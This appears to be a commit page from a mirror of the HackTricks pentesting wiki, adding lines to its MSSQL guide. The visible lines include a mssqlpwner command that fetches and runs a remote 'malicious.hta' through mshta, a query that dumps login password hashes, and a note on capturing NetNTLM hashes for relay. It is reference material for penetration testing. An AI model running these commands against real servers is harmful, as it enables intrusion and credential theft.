maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

a

Browse Source
This commit is contained in:
Carlos Polop 2025-02-19 20:20:13 +01:00
parent f522001b32
commit ca3d61e9ce
1 changed files with 6 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
View File

@ -252,6 +252,12 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec ho
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
```
### Get hashed passwords
```bash
SELECT * FROM master.sys.syslogins;
```
### Steal NetNTLM hash / Relay attack
You should start a **SMB server** to capture the hash used in the authentication (`impacket-smbserver` or `responder` for example).